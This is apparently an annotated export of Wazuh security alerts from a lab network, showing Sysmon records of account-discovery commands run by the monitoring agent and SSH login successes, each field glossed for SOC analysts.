data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:37.010 ProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00} ProcessId: 16636 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:37.010
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be5d-680a-1d0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:41.654+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:41.654+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534561.2254483
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:38.6904847Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290435
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:38.616 ProcessGuid: {94294ddc-be5e-680a-1f0c-000000000e00} ProcessId: 16440 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00} ParentProcessId: 16636 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:38.616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be5e-680a-1f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be5d-680a-1d0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:46.117+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:46.117+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534566.2259542
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:42.0654954Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290736
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:42.059 ProcessGuid: {94294ddc-be62-680a-200c-000000000e00} ProcessId: 8592 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:42.059
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be62-680a-200c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:42:46.440+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:46.440+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534566.2264775
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:42:45.773883+00:00 server1 sshd[3349]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:42:45.773883+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

sshd: authentication success.

🧠 What happened? sshd: authentication success.

🔍 Why it's important: Moderate‑risk ATT&CK technique

🕒 2025-04-24T22:42:46.440+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement'] – ['Valid Accounts', 'Remote Services'] [T1078] [T1021]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

[Medium] T1021 – Remote Services

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:46.440+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  sshd: authentication success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5715
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078', 'T1021']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts', 'Remote Services']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sshd', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534566.2265234
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:42:45.764776+00:00 server1 sshd[3349]: Accepted password for simba from 192.168.6.135 port 60874 ssh2
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:42:45.764776+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  sshd
Parent decoder used – for nested parsing.

decoder.name:  sshd
Name of the Wazuh decoder that parsed this raw log.

data.srcip:  192.168.6.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.srcport:  60874
Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Moderate‑risk ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.744+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.744+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2265701
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.0819453Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291045
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

